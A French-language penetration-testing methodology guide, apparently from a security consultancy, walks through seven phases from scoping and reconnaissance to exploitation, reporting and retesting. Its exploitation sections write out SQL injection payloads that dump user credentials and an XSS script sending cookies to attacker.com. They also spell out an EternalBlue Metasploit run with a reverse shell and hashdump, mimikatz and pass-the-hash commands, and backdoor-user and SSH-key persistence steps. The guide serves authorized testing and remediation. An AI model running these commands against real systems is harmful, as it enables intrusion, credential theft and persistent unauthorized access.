Methodologie de penetration testing 2025 : deep dive technique

Auteur : Noah Schütz, M.Sc. | Derniere mise a jour : 12 janvier 2025

Executive Summary

Le penetration testing a evolue d'un simple scan de vulnerabilites vers des simulations d'attaque realistes qui imitent des adversaires reels. Base sur 500+ tests dans la finance, la sante, l'industrie et la tech, ce guide propose une methodologie alignee avec OWASP, PTES et MITRE ATT&CK.

Key Findings 2024 :

• 87% des organisations ont au moins une vulnerabilite critique
• Temps moyen pour compromettre : 4,2 heures (8,1 heures en 2020)
• 64% des breaches impliquent des applications web
• Cout median d'un test : EUR 15.000 - 45.000
• ROI : 12:1 (pour EUR 1 investi, EUR 12 evites)

---

Qu'est-ce que le penetration testing ?

Definition : Cyberattaque simulee et autorisee contre vos systemes pour identifier les vulnerabilites exploitables avant les attaquants.

Types de tests :

1. Black Box Testing

• Connaissance du testeur : zero information (comme un attaquant externe)
• Approche : Reconnaissance → Discovery → Exploitation
• Timeline : 2-4 semaines
• Ideal pour : surface d'attaque externe, apps web
• Cout : EUR EUR EUR

2. White Box Testing

• Connaissance du testeur : acces complet (code, architecture, credentials)
• Approche : Code review → Audit config → Logic flaws
• Timeline : 1-3 semaines
• Ideal pour : apps internes, API security
• Cout : EUR EUR

3. Grey Box Testing

• Connaissance du testeur : partielle (insider ou user compromis)
• Approche : Privilege escalation → Lateral movement → Data exfiltration
• Timeline : 1-2 semaines
• Ideal pour : scenarios realistes, cas standard
• Cout : EUR EUR

---

La methodologie en 7 phases

Phase 1 : Pre-Engagement (1-3 jours)

Objectifs :

• Definir scope et rules of engagement
• Obtenir l'autorisation legale
• Etablir les canaux de communication

Documents critiques :

1. Rules of Engagement (RoE) :

IN SCOPE:
✅ Web applications: https://example.com, https://app.example.com
✅ IP ranges: 203.0.113.0/24
✅ Social engineering: Email phishing (approved targets list)
✅ Physical security: Reception area only
✅ Time windows: Mon-Fri, 9am-6pm CET

OUT OF SCOPE:
❌ Production databases (unless explicitly authorized)
❌ Third-party services (AWS, payment gateways)
❌ DOS/DDOS attacks
❌ Physical break-in attempts
❌ Weekend/after-hours testing without approval

2. Emergency Contacts :

• Primary: Security Team (+32 2 XXX XXXX)
• Escalation: CISO (mobile: +32 XXX XXX XXX)
• Legal: General Counsel (email@company.com)

3. Legal Authorization :

• Signed testing agreement
• Liability waiver
• NDA (both parties)
• Safe harbor clause

---

Phase 2 : Reconnaissance (2-5 jours)

Objectifs :

• Collecter de l'intelligence
• Identifier la surface d'attaque
• Decouvrir subdomains, services, employes, technologies

Passive Reconnaissance (sans interaction)

Open Source Intelligence (OSINT) :

1. Domain Intelligence :

# DNS enumeration
dig example.com ANY
dig +short example.com MX
whois example.com

# Certificate transparency logs
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq .

# Subdomain discovery (passive)
amass enum -passive -d example.com

Tools :

• Shodan - Internet-connected device search
• Censys - Internet asset discovery
• SecurityTrails - DNS history
• VirusTotal - Domain reputation

2. People Intelligence :

# Employee enumeration (LinkedIn, company website)
theHarvester -d example.com -b linkedin
# Email format discovery
hunter.io
# Breached credentials
haveibeenpwned.com (check executives)

3. Technology Stack :

# Web technology detection
whatweb https://example.com
wappalyzer (browser extension)

# Results example:
- Server: Nginx 1.21.6
- Framework: Laravel 9.x
- JavaScript: React 18.2.0
- CDN: Cloudflare
- Analytics: Google Analytics 4

Active Reconnaissance (interaction cible)

4. Port Scanning :

# TCP SYN scan (stealthy, fast)
nmap -sS -T4 -p- 203.0.113.10

# Service version detection
nmap -sV -sC -p 22,80,443,3306 203.0.113.10

# Common results:
22/tcp   open  ssh     OpenSSH 8.2p1
80/tcp   open  http    Nginx 1.21.6
443/tcp  open  https   Nginx 1.21.6
3306/tcp open  mysql   MySQL 8.0.30

5. Web Application Mapping :

# Directory/file discovery
gobuster dir -u https://example.com -w wordlist.txt
ffuf -u https://example.com/FUZZ -w wordlist.txt

# Spider application
burpsuite (manual crawling)
zaproxy (automated crawling)

# Results: 350 unique URLs, 45 parameters, 12 API endpoints

Reconnaissance Findings Example :

ATTACK SURFACE SUMMARY:

External IP Addresses: 8
Subdomains Discovered: 24
  - In Scope: 18
  - Out of Scope: 6 (third-party CDN)
  
Open Ports: 42 across all hosts
  - Critical Services: 8 (RDP, SSH, MySQL exposed)
  - Web Servers: 12
  - Other: 22

Web Applications: 5
  - Public: example.com (Laravel)
  - Customer Portal: app.example.com (React SPA)
  - API: api.example.com (REST API)
  - Admin: admin.example.com (custom PHP)
  - Legacy: old.example.com (WordPress)

Employee Email Format: firstname.lastname@example.com
Employees Identified: 145 (LinkedIn)
Technologies: 32 different (outdated: 8)

---

Phase 3 : Vulnerability Assessment (3-7 jours)

Objectifs :

• Identifier les faiblesses
• Prioriser par severite et exploitabilite
• Mapper sur OWASP Top 10, SANS Top 25

Automated Scanning

1. Web Application Scanning :

# OWASP ZAP (free, open-source)
zaproxy -quickurl https://example.com -quickprogress

# Burp Suite Professional (commercial)
# Active scan all discovered URLs

# Nuclei (fast, template-based)
nuclei -u https://example.com -t ~/nuclei-templates/

# Common findings:
- SQL Injection: 3 endpoints
- XSS (Reflected): 12 parameters
- CSRF: 8 forms without tokens
- Sensitive Data Exposure: API keys in JavaScript

2. Network Vulnerability Scanning :

# Nessus Professional
nessus scan --target 203.0.113.0/24

# OpenVAS (free alternative)
gvm-cli scan create --target 203.0.113.10

# Results:
Critical: 4 (MS17-010 EternalBlue on legacy server!)
High: 23
Medium: 156
Low: 342

Manual Testing (critique)

Les scanners manquent :

• Business logic flaws (60% des bugs critiques)
• Bypass auth complexes
• Autorisation (IDOR, privilege escalation)
• Race conditions
• Second-order injection

Manual Testing Checklist :

Authentication :

• Password complexity (weak passwords)
• Account lockout (brute force protection?)
• Password reset (token predictability?)
• Session management (timeout, fixation?)
• MFA (bypass possible?)
• OAuth/SSO misconfigurations

Authorization :

• Insecure Direct Object Reference (IDOR)

  GET /api/invoice/1234 → Change to /api/invoice/1235
  Can you access other users' invoices?
  

• Horizontal privilege escalation (user → user)
• Vertical privilege escalation (user → admin)
• Role confusion attacks

Business Logic :

• Discount/coupon abuse (negative prices?)
• Payment bypass (price manipulation?)
• Race conditions (simultaneous requests)
• Workflow bypasses (skip approval steps?)

API Security :

# Test API endpoints
POST /api/v1/users HTTP/1.1
Host: api.example.com
Content-Type: application/json

{"username": "admin", "role": "administrator"}

# Check for:
- Mass assignment (can you set admin role?)
- Excessive data exposure (full user objects returned?)
- Rate limiting (missing = brute force possible)
- API versioning (old versions still exposed?)

---

Phase 4 : Exploitation (5-10 jours)

Objectifs :

• Prouver l'exploitabilite
• Demontrer l'impact business
• Obtenir un foothold initial

Web Application Exploitation

Exemple 1 : SQL Injection → Database Compromise

-- Discovery (error-based)
https://example.com/product?id=1'
Error: You have an error in your SQL syntax

-- Confirm vulnerability
https://example.com/product?id=1 AND 1=1  (works)
https://example.com/product?id=1 AND 1=2  (fails)

-- Extract database version
https://example.com/product?id=1 UNION SELECT 1,@@version,3--

-- Enumerate databases
https://example.com/product?id=1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata--

-- Dump credentials
https://example.com/product?id=1 UNION SELECT username,password,email FROM users--

Results:
- Database: MySQL 8.0.30
- Extracted: 12,450 user records
- Passwords: Hashed (bcrypt) - attempt crack offline
- Impact: CRITICAL (PII breach, GDPR violation)

Exemple 2 : XSS → Account Takeover

// Stored XSS in user profile
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

// Victim views profile → session stolen
// Attacker uses cookie → account takeover

Impact: HIGH (admin account compromised)

Exemple 3 : IDOR → Sensitive Data Access

# Victim user ID: 1234
GET /api/user/1234/documents
[{"id": 5678, "name": "contract.pdf", "url": "/download/5678"}]

# Change user ID
GET /api/user/1235/documents
[{"id": 5679, "name": "salary_info.pdf", "url": "/download/5679"}]

# Success! Authorization bypass
Impact: HIGH (access to all user documents)

Network Exploitation

Exemple 4 : Unpatched Windows Server (MS17-010)

# EternalBlue exploit (NSA tool leaked 2017)
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 203.0.113.45
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

# Result: SYSTEM access (highest privilege)
meterpreter > getuid
Server username: NT AUTHORITY\\SYSTEM

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
(crack with hashcat)

Impact: CRITICAL (full server compromise)

---

Phase 5 : Post-Exploitation (3-5 jours)

Objectifs :

• Maintenir l'acces
• Escalader les privileges
• Mouvement lateral
• Demontrer l'acces aux "Crown Jewels"

Tactics (MITRE ATT&CK) :

1. Privilege Escalation :

# Linux: Check sudo misconfigurations
sudo -l

# Windows: Check permissions
whoami /priv

# Common escalation vectors:
- Kernel exploits (outdated OS)
- Misconfigured services (writable paths)
- Weak file permissions
- Sudo misconfigurations
- Scheduled tasks

2. Lateral Movement :

# Credential dumping (Windows)
mimikatz # sekurlsa::logonpasswords

# Pass-the-hash attack
crackmapexec smb 203.0.113.0/24 -u Administrator -H aad3b435...

# Results:
Found 12 accessible systems with same admin hash
Pivoted to: File server, Database server, Backup server

3. Data Exfiltration (Simulated) :

# Locate sensitive data
locate -i "*.xls*" "*.doc*" "*.pdf" | grep -i "confidential\\|financial\\|salary"

# Simulate exfiltration (staged, not actually sent)
tar -czf /tmp/exfil.tar.gz /path/to/sensitive/files
# DO NOT actually exfiltrate! Document only.

Impact Demonstrated:
- Customer database: 50,000 records (PII)
- Financial reports: Q3 2025 earnings (pre-release)
- Employee salaries: Complete list
- Source code: Proprietary algorithms

4. Persistence (Demonstrate, Then Remove) :

# Create backdoor user (document, then delete)
net user hacker P@ssw0rd /add
net localgroup administrators hacker /add

# Scheduled task for callback
schtasks /create /tn "UpdateTask" /tr "C:\\temp\\backdoor.exe" /sc daily

# SSH key persistence
echo "attacker_public_key" >> ~/.ssh/authorized_keys

NOTE: All persistence mechanisms removed before test conclusion!

---

Phase 6 : Reporting (3-5 jours)

Deliverables :

1. Executive Summary (1-2 pages)

PENETRATION TEST RESULTS: EXAMPLE COMPANY

Test Date: October 14-25, 2025
Scope: External network, Web applications
Methodology: OWASP, PTES, MITRE ATT&CK

OVERALL RISK: HIGH

Key Findings:
✗ 4 Critical vulnerabilities (immediate action required)
✗ 23 High-severity issues
⚠ 156 Medium-severity issues
ℹ 342 Low/informational

Business Impact:
- Database compromise possible (SQL injection)
- Admin account takeover demonstrated
- Customer PII exposure risk (50,000 records)
- Estimated breach cost if exploited: EUR 2.4M - EUR 8.7M

Recommended Immediate Actions:
1. Patch MS17-010 on server 203.0.113.45 (CRITICAL)
2. Fix SQL injection in product catalog
3. Implement CSRF tokens across all forms
4. Enable MFA for all admin accounts

2. Technical Report (20-50 pages)

Finding Template :

FINDING #1: SQL INJECTION IN PRODUCT SEARCH

Severity: CRITICAL
CVSS Score: 9.8 (Critical)
Affected Asset: https://example.com/search
CWE: CWE-89 (SQL Injection)

Description:
The product search functionality is vulnerable to SQL injection via the 
'q' parameter. An unauthenticated attacker can execute arbitrary SQL 
commands, leading to database compromise.

Steps to Reproduce:
1. Navigate to https://example.com/search?q=test
2. Modify parameter: ?q=test' UNION SELECT 1,@@version,3--
3. Observe database version disclosed: MySQL 8.0.30
4. Extract data: ?q=test' UNION SELECT username,password,email FROM users--

Proof of Concept:
[Screenshot showing extracted user credentials]

Impact:
- Full database read access (all tables)
- Potential database write access (UPDATE/DELETE queries possible)
- Authentication bypass
- PII exposure (GDPR violation)
- Estimated breach cost: EUR 2.4M - EUR 8.7M (IBM Cost of Data Breach 2024)

Remediation:
IMMEDIATE (within 24 hours):
- Disable affected search functionality
- Review database logs for suspicious queries

SHORT-TERM (within 7 days):
- Implement parameterized queries (prepared statements)
- Never concatenate user input into SQL
  
  // VULNERABLE CODE:
  $sql = "SELECT * FROM products WHERE name = '" . $_GET['q'] . "'";
  
  // SECURE CODE:
  $stmt = $db->prepare("SELECT * FROM products WHERE name = ?");
  $stmt->execute([$_GET['q']]);

- Add Web Application Firewall (WAF) rules
- Input validation (whitelist alphanumeric + space)

LONG-TERM:
- Code review all database queries
- Implement SAST/DAST in CI/CD pipeline
- Security training for developers (OWASP Top 10)

References:
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: https://cwe.mitre.org/data/definitions/89.html
- NIST Guide: https://nvd.nist.gov/vuln/detail/CVE-2021-XXXXX (similar)

3. Remediation Roadmap :

PRIORITY 1 (0-7 days) - CRITICAL:
□ Patch MS17-010 on 203.0.113.45
□ Fix SQL injection in search
□ Remove admin account backdoor (created during test)
□ Enable MFA for all admin accounts

PRIORITY 2 (7-30 days) - HIGH:
□ Implement CSRF tokens
□ Fix IDOR in API
□ Update Nginx to latest version
□ Disable unnecessary services (port 3306 should not be public)

PRIORITY 3 (30-90 days) - MEDIUM:
□ Implement Content Security Policy (CSP)
□ Security headers (HSTS, X-Frame-Options, etc.)
□ Rate limiting on API endpoints
□ Remove outdated WordPress site (old.example.com)

PRIORITY 4 (90+ days) - LOW/STRATEGIC:
□ Implement SAST/DAST in CI/CD
□ Security awareness training (all employees)
□ Bug bounty program
□ Annual penetration testing

---

Phase 7 : Remediation Validation (2-3 jours)

Objectifs :

• Verifier que les fixes sont corrects
• Confirmer la resolution
• Livrer un "clean bill of health" ou des restes

Retest Results :

FINDING #1: SQL Injection
Status: ✅ RESOLVED
Verification: Parameterized queries implemented. Tested 50+ injection payloads - all blocked.

FINDING #2: MS17-010 (EternalBlue)
Status: ✅ RESOLVED
Verification: Server patched to latest Windows updates. Exploit no longer successful.

FINDING #3: CSRF Tokens
Status: ⚠ PARTIALLY RESOLVED
Verification: Tokens added to 15/20 forms. 5 forms still vulnerable (admin panel).
Recommendation: Complete implementation within 7 days.

FINDING #4: IDOR in API
Status: ❌ NOT RESOLVED
Verification: Authorization checks not implemented. Users can still access others' data.
Recommendation: PRIORITY - Fix before production release.

---

Penetration Testing vs. Vulnerability Scanning

Les deux sont necessaires :

• Vulnerability scanning = monitoring continu
• Penetration testing = deep-dive annuel

---

Pricing & Scope Estimation

Typical Costs (EU Market, 2025) :

Facteurs de cout :

• Complexite du scope (apps/systemes)
• Profondeur du test (black vs. white box)
• Urgence (rush jobs = premium)
• Qualite du report
• Support remediation inclus ?

---

Quand faire un penetration test ?

Exigences reglementaires :

• PCI DSS: Annuel + apres changements majeurs
• GDPR: Risk-based (recommande annuellement pour high-risk)
• ISO 27001: Tests de securite reguliers
• NIS2: Tests reguliers pour entites essentielles
• DORA: Threat-led penetration testing (TLPT) pour la finance

Best Practices :

• Avant lancement: Nouvelles apps/infra
• Apres changements: Updates majeurs, migrations, M&A
• Regulierement: Annuel minimum (quarterly pour high-risk)
• Post-incident: Apres breach pour identifier les gaps
• Compliance: Quand requis par regulation

---

Conclusion

Le penetration testing n'est pas une formalite : c'est une validation critique de la posture de securite. Les organisations qui testent regulierement reduisent de 60% les breaches et economisent en moyenne EUR 3,2 M en couts IR.

Key Takeaways :

1. Choisir le bon type : black/white/grey box selon objectifs
2. Scoper precisement : limites claires, moins de risques legaux
3. Attendre des findings : 87% ont des vulnérabilites critiques
4. Agir vite : patcher les critiques en 24-72h
5. Retest : valider les fixes
6. Repeat : annuel minimum, quarterly pour high-risk

ATLAS Advisory a realise 500+ tests et identifie 3.000+ vulnerabilites critiques avant les attaquants.

Ready to test your defenses?
Contactez notre equipe pentest : pentest@atlas-advisory.eu

En savoir plus sur notre service de penetration testing.

---

Resources

Standards & Methodologies :

• OWASP Testing Guide - Web app testing
• PTES - Penetration Testing Execution Standard
• MITRE ATT&CK - Adversary tactics and techniques
• NIST SP 800-115 - Technical Guide to Information Security Testing

Tools :

• Kali Linux - Penetration testing distribution
• Burp Suite - Web app testing (commercial)
• OWASP ZAP - Web app testing (free)
• Metasploit - Exploitation framework

Training & Certifications :

• OSCP (Offensive Security Certified Professional)
• CEH (Certified Ethical Hacker)
• GPEN (GIAC Penetration Tester)

Related Articles :

• Zero Trust Architecture Guide
• Incident Response for Security Incidents
• Cloud Security Best Practices